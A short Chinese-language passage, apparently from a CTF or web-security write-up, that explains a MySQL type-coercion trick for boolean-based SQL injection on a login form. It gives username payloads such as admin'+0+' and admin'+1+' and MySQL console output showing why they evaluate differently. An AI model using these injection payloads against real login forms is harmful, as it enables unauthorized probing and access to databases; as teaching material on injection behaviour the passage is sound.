1. admin'+1+' (false,注意把+换为%2b)
    2. admin'+0+' (true,注意把+换为%2b)
    5. select * from user where name='admin'+1+'' and passwd='123456';(为false) ==>提示用户名错误
    6. select * from user where name='admin'+0+'' and passwd='123456';(为true) ==>提示密码错误

    这里是mysql的一个特性,可能有不明白的师傅,可以做下实验

    3. mysql> select 'admin'='admin'+0 union select 'admin'='admin'+1;
    4. +-------------------+
    5. | 'admin'='admin'+0 |
    6. +-------------------+
    7. |                 1 |
    8. |                 0 |
    9. +-------------------+
    10. 2 rows in set, 4 warnings (0.00 sec)
    12. mysql> select 'admin'='admin'+0;
    13. +-------------------+
    14. | 'admin'='admin'+0 |
    15. +-------------------+
    16. |                 1 |
    17. +-------------------+
    18. 1 row in set, 2 warnings (0.00 sec)

    前者为1后者为0,先对右边的等式做运算,发生强制转换,结果为数字,然后再和左边的admin字符做比较,又发生了强制转换,因此出现1和0的区别。